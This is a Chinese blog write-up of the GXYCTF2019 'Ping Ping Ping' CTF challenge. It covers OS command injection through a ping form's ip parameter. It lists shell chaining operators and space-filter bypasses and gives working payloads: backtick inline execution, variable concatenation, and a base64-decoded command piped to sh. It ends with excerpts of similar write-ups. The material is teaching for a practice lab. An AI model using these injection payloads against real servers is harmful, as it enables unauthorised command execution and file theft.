[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-08-10 18:49:59 发布
最新推荐文章于 2024-08-10 18:49:59 发布
阅读量269 收藏 1
点赞数
文章标签: 安全
Wuuconix wanna a girlfriend!
本文链接:https://blog.csdn.net/Cypher_X/article/details/114482641
版权
本文详细介绍了在CTF比赛中遇到的一道关于命令注入的题目,涉及命令联合执行的各种符号,如分号、管道符等。通过尝试和研究,作者发现可以利用变量拼接来绕过过滤,最终成功读取文件。文章还提到了其他可能的解题方法,如内联执行和加密解密。同时,文章列举了多种绕过空格过滤的技巧,并分享了相关参考资料。
摘要由CSDN通过智能技术生成

[GXYCTF2019]Ping Ping Ping

  • 一进去提示我们输入ip

  • 在这里插入图片描述

  • 我们随便输入一个试试

  • 在这里插入图片描述

  • 在网上查阅资料后,了解题目的知识点是命令联合执行,需要用到连接符,以下是常用的命令联合执行符号

  • ;     前面的执行完执行后面的
|     管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)         
||    当前面的执行出错时(为假)执行后面的
&     将任务置于后台执行
&&    前面的语句为假则直接出错,后面的也不执行,前面只能为真
%0a  (换行)
%0d  (回车)

  • 简单一下ls,发现有flag.php和index.php

  • 在这里插入图片描述

  • 试一下看看能不能直接cat出来,发现空格被过滤了

  • 在这里插入图片描述

  • 查阅资料后发现了一些绕过空格的方法

  • $IFS	//在这道题里不知道为什么不行
${IFS}
$IFS$1 //$1改成$加其他数字都行
< 
<> 
{cat,flag.php}  //用逗号实现了空格功能
%20 
%09

  • 在这道题里貌似只能选择$IFS$1,其他的都被过滤。结果发现flag也被过滤了。

  • 在这里插入图片描述

  • 好吧,那么我们只能先看看index.php里面有什么了。里面列出了过滤的东西,很多符号都被过滤了

  • 在这里插入图片描述

  • 最后利用变量拼接绕过

  • 在这里插入图片描述

  • 这里的变量是随便取名字的,当然也可以这样

  • 在这里插入图片描述

  • 但是要注意实际使用的时候要在变量之前加上$符号;此外这里必须用分号作为连接符,用|符号失败了。分号前面执行完执行后面,没有把之前的结果作为后面的参数之类的复杂效果,属于最朴素的连接符,以后可以多用。

  • 还有另外一种解题方法,就是利用反应号``进行内联执行,把ls的结果作为cat的参数进行执行

  • payload:?ip=127.0.0.1;cat$IFS$9`ls`

  • 在这里插入图片描述

  • 看网上说还有一种用sh执行的方法,看不太懂,貌似进行了加密

  • echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

  • 参考链接

    • https://www.cnblogs.com/wangtanzhi/p/12246386.html
    • https://blog.csdn.net/vanarrow/article/details/108295481
    • https://blog.csdn.net/satasun/article/details/106266372
    • https://blog.csdn.net/qq_42812036/article/details/104297163
Wuuconix
关注
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1440
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5174
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 8006
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
buuctf-[GXYCTF2019]禁止套娃1-详解-无参数rce
最新发布
chinese_cabbage0的博客
08-10 256
讲解了buuctf的[GXYCTF2019]禁止套娃题目的解题过程,非常详细,附有两种解题方法
[GXYCTF2019]PING PING PING
車鈊的博客
08-19 602
观察题目: 页面: /?ip= 主网址: http://09703780-fff4-4a8d-be6c-496d349f5c74.node3.buuoj.cn/ 解题: 扫描目录: ?ip=127.0.0.1;ls >> flag.php index.php 尝试读文件: ?ip=127.0.0.1;cat%20flag.php >> /?ip= 1fxck your space! 屏蔽了空格 替换空格: ?ip=127.0.0.1;cat$IFS$1flag.php
BUUCTF[GXYCTF2019]Ping Ping Ping
楼阁de猫的博客
12-19 260
[GXYCTF2019]Ping Ping Ping 直接ping 127.0.0.1 有回显,ls一下 发现flag.php,cat一下 事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法 $IFS ${IFS} $IFS$9 //$9改成 $ 加其他数字貌似都行 < <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09(Tab) 这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p
[GXYCTF2019]Ping Ping Ping (命令执行)
一期一会的博客
12-27 719
命令执行 过滤空格 %20(space)、%09(tab)、$IFS$9、 IFS、IFS 使用<或者<>来绕过空格 cat<a.txt 花括号扩展{OS_COMMAND,ARGUMENT} {cat,/etc/passwd} IFS空格绕过catIFS 空格绕过 catIFS空格绕过catIFSa.txt 变量控制 X=$'cat\x09./flag.php 关键字过滤 使用空变量 使用∗和*和∗和@,x(x代表1−9),x(x 代表 1-9),x(x代表1−9),{x}(x&gt
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 3158
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值